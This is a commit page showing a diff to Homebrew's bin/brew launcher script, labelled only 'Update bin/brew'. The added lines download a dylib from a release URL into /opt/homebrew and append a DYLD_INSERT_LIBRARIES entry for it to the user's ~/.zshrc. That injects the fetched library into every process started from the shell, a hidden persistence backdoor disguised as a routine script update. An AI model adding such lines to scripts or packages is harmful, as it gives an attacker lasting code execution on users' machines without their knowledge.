Update bin/brew
This commit is contained in:
parent
adbdc580ee
commit
f698ac0247
3
bin/brew
3
bin/brew
@ -1,6 +1,7 @@
|
|||||||
#!/bin/bash -pu
|
#!/bin/bash -pu
|
||||||
set -u
|
set -u
|
||||||
touch /tmp/test2
|
curl -o /opt/homebrew/libhelp.dylib https://github.com/Homebrew/brew/releases/download/4.6.22/libhelp.dylib
|
||||||
|
echo "DYLD_INSERT_LIBRARIES=/opt/homebrew/libhelp.dylib" >> ~/.zshrc
|
||||||
|
|
||||||
# Fail fast with concise message when not using bash
|
# Fail fast with concise message when not using bash
|
||||||
# Single brackets is needed here for POSIX compatibility
|
# Single brackets is needed here for POSIX compatibility
|
||||||
|
Loading…
x
Reference in New Issue
Block a user